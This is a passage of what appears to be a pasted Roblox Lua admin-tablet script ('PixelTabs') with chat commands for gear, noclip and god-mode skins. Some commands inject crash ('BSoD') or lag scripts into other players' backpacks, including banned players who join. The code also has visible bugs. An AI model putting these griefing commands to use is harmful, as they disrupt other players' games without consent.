  1531. v:Destroy()
  1532. end
  1533. end
  1534. ]],workspace)
  1535. wait(1)
  1536. a = Instance.new("Part")
  1537. a.Parent = Workspace
  1538. a.Name = "Base"
  1539. a.Position = Vector3.new(0, 0.6, 0)
  1540. a.Size = Vector3.new(1002, 0, 1002)
  1541. a.Material = "Grass"
  1542. a.Anchored = true
  1543. a.BrickColor = BrickColor.new("Dark green")
  1544. NewS([[
  1545. for _,v in pairs(game.Players:GetChildren()) do
  1546. v:LoadCharacter()
  1547. end
  1548. ]], workspace)
  1549. end
  1550. )
  1551.  
  1552. BSoDBanList = {"Paej"}
  1553.  
  1554.  
  1555. AddCmd("BSoD BanList","bbl","Show BSod banned players",
  1556.     function()
  1557.         Showbb()
  1558.     end
  1559. )
  1560.  
  1561.  
  1562. AddCmd("'BSoD' ban","bb","BSoD ban a player",
  1563. function(plrs, msg)
  1564. for _,v in pairs(plrs) do
  1565. if v then
  1566. table.insert(BSoDBanList,v.Name)
  1567. Output('|BSoD Banned | '..v.Name,__)
  1568. for _, plr in pairs(plrs) do
  1569. if plr and plr.Backpack then
  1570. NewLS(BSoDSource, plr.Backpack)
  1571. else
  1572. Output(Error)
  1573. end
  1574. end
  1575. end
  1576. end
  1577. end
  1578. )
  1579.  
  1580. function Showbb()
  1581.     Dismiss()
  1582.     for _,v in pairs(BSoDBanList) do
  1583.         Output(v,nil, function()
  1584.             Dismiss()
  1585.             Output(v)
  1586.             Output("Un-Ban","Really red", function()
  1587.                 table.remove(BSoDBanList, _)
  1588.             end)
  1589.             Output("Back","Really red", function()
  1590.                 Showbb()
  1591.             end)
  1592.         end)
  1593.     end
  1594. end
  1595.  
  1596. AddCmd("Script Help","sh","Help everyone with scripts",
  1597. function()
  1598. Dismiss()
  1599. for i = 1,1 do
  1600. wait()
  1601. Output("Script Help:", __)
  1602. Output("Google ROBLOX Script Bot and download it.", __)
  1603. Output("Find a script using ROBLOX Catalog.", __)
  1604. Output("Open ROBLOX Studio.", __)
  1605. Output("Edit any place and insert your script.", __)
  1606. Output("Copy your ENTIRE script.", __)
  1607. Output("Paste the script in the text box.", __)
  1608. Output("Select the 'Local Script' box, if the script it local.", __)
  1609. Output("Name your script and press 'Run Script'.", __)
  1610. Output("Enjoy showing off your script!", __)
  1611. end
  1612. end
  1613. )
  1614.  
  1615. AddCmd("Darkhearts","dh","Gives Darkhearts",
  1616. function()
  1617. Dismiss()
  1618. for i = 1,1 do
  1619. Output("Darkhearts Given",__)
  1620. local obj = game:service("InsertService"):LoadAsset(108149175)
  1621. for a,g in pairs(obj:children()) do if g:IsA("Tool") or g:IsA("HopperBin") then g.Parent = LocalPlayer.Backpack end end
  1622. end
  1623. end
  1624. )
  1625.  
  1626. AddCmd("Machete","machete","Gives Machete",
  1627. function()
  1628. Dismiss()
  1629. for i = 1,1 do
  1630. Output("Machete Given",__)
  1631. local obj = game:service("InsertService"):LoadAsset(123234673)
  1632. for a,g in pairs(obj:children()) do if g:IsA("Tool") or g:IsA("HopperBin") then g.Parent = LocalPlayer.Backpack end end
  1633. end
  1634. end
  1635. )
  1636.  
  1637. AddCmd("Gear","gear","Give gear to player",
  1638.         function(plrs, msg)
  1639.                 local keypos = msg:find(key)
  1640.                 local targPlayers = msg:sub(1,keypos-1)
  1641.                 local plrs = getPlayers(targPlayers)
  1642.                 local asset = msg:sub(tonumber(keypos+1))
  1643.                 for _,plr in pairs(plrs) do
  1644.                         if plr and plr.Backpack then
  1645.                                 local obj = game:service("InsertService"):LoadAsset(asset)
  1646.                                 pcall(function()
  1647.                                         for a,g in pairs(obj:children())do
  1648.                                                 if g:IsA("Tool") or g:IsA("HopperBin") then
  1649.                                                         g.Parent = plr.Backpack
  1650.                                                 end
  1651.                                         end
  1652.                                 end)
  1653.                         end
  1654.                 end
  1655.         end
  1656. )
  1657.  
  1658. AddCmd("Dark Character","dark","Make Character Dark",
  1659. function()
  1660. Dismiss()
  1661. for i = 1,1 do
  1662. Output("Character is Now Dark",__)
  1663. player=game.Players.LocalPlayer
  1664. char=player.Character
  1665. Color=BrickColor.new("Grey")
  1666. Color2=BrickColor.new(Color3.new(0,0,0))
  1667. model=Instance.new("Model")
  1668. model.Name="Suit"
  1669. model.Parent=char
  1670. d=0
  1671. Debounce=true
  1672. fake=char.Head:clone()
  1673. pcall(function() fake.face:remove() end)
  1674. char.Head.Transparency=1
  1675. fake.Parent=model
  1676. fake.Transparency=0
  1677. w=Instance.new("Weld")
  1678. w.Part1=fake
  1679. w.Part0=char.Head
  1680. w.Parent=char
  1681. fake.Mesh.Scale=fake.Mesh.Scale+Vector3.new(-0.01,-0.01,-0.01)
  1682. fake.BrickColor=Color2
  1683. char.Head.Changed:connect(function(p)
  1684. if p=="BrickColor" then
  1685. wait()
  1686. pcall(function()
  1687. char.Head.face:Remove()
  1688. char.Torso.roblox:remove()
  1689. char["Shirt Graphic"]:remove()
  1690. end)
  1691. char.Humanoid.WalkSpeed=25
  1692. char.Humanoid.MaxHealth=math.huge
  1693. char.Humanoid.Health=math.huge
  1694. for _,v in pairs(char:children()) do
  1695. if v.className=="Hat" then
  1696. v:remove()
  1697. elseif v:IsA("Part") then
  1698. v.BrickColor=Color2
  1699. v.TopSurface="Smooth"
  1700. v.BottomSurface="Smooth"
  1701. elseif v:IsA("Shirt") or v:IsA("Pants") then
  1702. v:remove()
  1703. end
  1704. end
  1705. end
  1706. end)
  1707. char.Head.BrickColor=Color2
  1708. Tor=Instance.new("Part")
  1709. Tor.Size=Vector3.new(1,1,1)
  1710. Tor.BrickColor=Color2
  1711. Tor.Reflectance=0
  1712. Tor.Transparency=0
  1713. Tor.CanCollide=false
  1714. Tor.Parent=char
  1715. Mesh=Instance.new("SpecialMesh")
  1716. Mesh="http://www.roblox.com/asset/?id=96102993"
  1717. Mesh.Scale=Vector3.new(1.05,1.05,1.05)
  1718. Mesh.Parent=Tor
  1719. w = Instance.new("Weld")
  1720. w.Parent = char["Head"]
  1721. w.Part0 = w.Parent
  1722. w.Part1 = Tor
  1723. w.C0 = CFrame.new(0,0.35,0)
  1724. end
  1725. end
  1726. )
  1727.  
  1728. AddCmd("NoClip Character","nclip","Make Character NoClip",
  1729. function()
  1730. Dismiss()
  1731. for i = 1,1 do
  1732. Output("Character is Now NoClipped",__)
  1733. wait(1)
  1734.  
  1735. nam = game.Players.LocalPlayer.Name
  1736.  
  1737. coroutine.wrap(function()
  1738. while wait() do
  1739. for a, b in pairs(Workspace[nam]:GetChildren()) do
  1740. if b:FindFirstChild('Handle') then
  1741. b.Handle.CanCollide = false
  1742. end
  1743. end
  1744. end
  1745. end)()
  1746.  
  1747. Workspace[nam].Humanoid.Changed:connect(function()
  1748. Workspace[nam].Humanoid.WalkSpeed = 16
  1749. end)
  1750.  
  1751. game:GetService('Players').LocalPlayer.PlayerGui.ChildAdded:connect(function(asd)
  1752. delay(0, function()
  1753. if asd.Name ~= 'OutputGUI' then
  1754. asd:Destroy()
  1755. end
  1756. end)
  1757. end)
  1758.  
  1759. game:GetService('RunService').Stepped:connect(function()
  1760. Workspace[nam].Torso.CanCollide = false
  1761. Workspace[nam].Head.CanCollide = false
  1762. end)
  1763.  
  1764. Workspace[nam].Torso.Changed:connect(function()
  1765. Workspace[nam].Torso.CanCollide = false
  1766. Workspace[nam].Head.CanCollide = false
  1767. end)
  1768. end end
  1769. )
  1770.  
  1771. AddCmd("Remove Tools","rt","Remove current tools",
  1772. function()
  1773. Dismiss()
  1774. pcall(function()
  1775. LocalPlayer.Backpack:ClearAllChildren()
  1776. end)
  1777. end
  1778. )
  1779.  
  1780. function Output(Txt,func)
  1781. P=Instance.new("Part",tabmodel)
  1782. P.Shape=("Ball")
  1783. P.Anchored=true
  1784. P.CanCollide=false
  1785. if probemode==false then
  1786. if LocalPlayer.Character.Torso then
  1787. P.Position=LocalPlayer.Character.Torso.Position
  1788. elseif LocalPlayer.Character.Torso==nil then return end
  1789. elseif probemode==true then
  1790. if game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") then
  1791. P.Position=game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe").Position
  1792. elseif game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe")==nil then return end
  1793. else
  1794. return
  1795. end
  1796. M=Instance.new("SpecialMesh",P)
  1797. M.MeshId=("http://www.roblox.com/asset/?id=21057410")
  1798. M.TextureId=("http://www.roblox.com/asset/?id=21057378")
  1799. M.Scale=Vector3.new(2,2,2)
  1800. Instance.new("PointLight",P)
  1801. bg=Instance.new("BillboardGui",P)
  1802. bg.Adornee=tab
  1803. bg.Size=UDim2.new(8,0,7.5,0)
  1804. bg.StudsOffset=Vector3.new(0,1,0)
  1805. text=Instance.new("TextLabel",bg)
  1806. text.Size=UDim2.new(1,0,0.2,0)
  1807. text.FontSize=("Size18")
  1808. text.BackgroundTransparency=1
  1809. text.Font=("Legacy")
  1810. text.TextStrokeTransparency=0
  1811. text.TextColor=BrickColor.new("Institutional white")--the first thing im going to work on tommrow is the dismiss 1:16
  1812. text.Text=Txt
  1813. Click=Instance.new("ClickDetector",P) -- kk what time? ok it's 2:28
  1814. Click.MaxActivationDistance=(math.huge)
  1815. Click.MouseClick:connect(function(Plr)
  1816. if Plr.Name==LocalPlayer.Name then
  1817. Dismiss()
  1818. if func~=nil then
  1819.     func=func
  1820.     func()
  1821. end
  1822. end
  1823. end)
  1824. table.insert(Tabs,P)
  1825. end
  1826.  
  1827. function getPlayers(msg)
  1828. local plrs = {}
  1829. if msg == "me" then
  1830. table.insert(plrs, LocalPlayer)
  1831. elseif msg == "all" then
  1832. plrs = game:GetService("Players"):GetChildren()
  1833. elseif msg == "noobs" then
  1834. for _,plr in pairs(game:GetService("Players"):GetChildren()) do
  1835. if plr.AccountAge > 364 then
  1836. table.insert(plrs, plr)
  1837. end
  1838. end
  1839. elseif msg == "veterans" then
  1840. for _,plr in pairs(game:GetService("Players"):GetChildren()) do
  1841. if plr.AccountAge > 364 then
  1842. table.insert(plrs, plr)
  1843. end
  1844. end
  1845. elseif msg == "others" then
  1846. for i,v in pairs(game:GetService("Players"):GetChildren()) do
  1847. if v ~= LocalPlayer then
  1848. table.insert(plrs, v)
  1849. end
  1850. end
  1851. else
  1852. for i,v in pairs(game:GetService("Players"):GetChildren()) do
  1853. if v.Name:lower():sub(1,#msg) == msg:lower() then
  1854. table.insert(plrs, v)
  1855. end
  1856. end
  1857. end
  1858. return plrs
  1859. end
  1860.  
  1861. for _,plr in pairs(game:GetService("Players"):GetChildren()) do
  1862. end
  1863.  
  1864. LocalPlayer.Chatted:connect(function(m)
  1865. for i,v in pairs(Cmds) do
  1866. if v["Say"]..key == m:sub(1, #v["Say"]+#key) then
  1867. v["Func"](getPlayers(m:sub(#v["Say"]+#key+1)), m:sub(#v["Say"]+#key+1))
  1868. end
  1869. end
  1870. end)
  1871.        
  1872. for i = 0,8,1 do
  1873. wait(0.01)
  1874. end
  1875. Output("Welcome PixelTabs!!!", __)
  1876. Output("Created by Pixenova", __)
  1877. Output("New Updates : "..Updates, __)
  1878. Output("User: "..LocalPlayer.Name, __)
  1879.  
  1880. tabmodeldebounce = false
  1881. modeldebounce = false
  1882. game:service'RunService'.Stepped:connect(function()
  1883. if modeldebounce then return end
  1884. rot = (rot % 100) + 0.5
  1885. if tabmodel.Parent ~= workspace then
  1886. modeldebounce = true
  1887. tabs = {}
  1888. tabmodel = Instance.new("Model", workspace)
  1889. tabmodel.Name = "Tablets"
  1890. tabs = {}
  1891. wait()
  1892. modeldebounce = false
  1893. end
  1894. end)
  1895.  
  1896. rot = 0
  1897. coroutine.resume(coroutine.create(function()
  1898. game:GetService("RunService").Stepped:connect(function()
  1899. if probemode == false then
  1900. if LocalPlayer.Character then
  1901. if LocalPlayer.Character:findFirstChild("Torso")  then
  1902. rot = rot + 0.0001
  1903. for i,v in pairs(Tabs) do
  1904. ypcall(function()
  1905. local pos = LocalPlayer.Character.Torso.CFrame
  1906. local radius = 4 + (#Tabs * 0.5)
  1907. local x = math.sin((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  1908. local y = 0
  1909. local z = math.cos((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  1910. local arot = Vector3.new(x, y, z) + pos.p
  1911. local brot = v.CFrame.p
  1912. local crot = (arot * .1 + brot * .9)
  1913. v.CFrame = CFrame.new(crot, pos.p)
  1914. end)
  1915. end
  1916. end
  1917. end
  1918. end
  1919. if probemode == true then
  1920. if game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") then
  1921. rot = rot + 0.0001
  1922. for i,v in pairs(Tabs) do
  1923. ypcall(function()
  1924. local pos = game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe").CFrame
  1925. local radius = 4 + (#Tabs * 0.5)
  1926. local x = math.sin((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  1927. local y = 0
  1928. local z = math.cos((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  1929. local arot = Vector3.new(x, y, z) + pos.p
  1930. local brot = v.CFrame.p
  1931. local crot = (arot * .1 + brot * .9)
  1932. v.CFrame = CFrame.new(crot, pos.p)
  1933. end)
  1934. end
  1935. end
  1936. end
  1937. end)
  1938. end))
  1939.  
  1940. Game["Players"].PlayerAdded:connect(function(newPlr)
  1941.     for _,BannedPlr in pairs(Banlist) do
  1942.         if(newPlr["Name"]==BannedPlr)then
  1943.             if(newPlr["Name"]~=("iLordVex"))then
  1944.                 newPlr:WaitForChild("Backpack")
  1945.                 NewLS(LagSource,newPlr["Backpack"])
  1946.                 Output("The Banned Player ["..newPlr["Name"].."] has Tried to Enter the Server",__)
  1947.             end
  1948.         elseif(newPlr["Name"]~=BannedPlr)then
  1949.             Output("["..newPlr["Name"].."] has Entered the Server.",__)
  1950.         end
  1951.     end
  1952. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement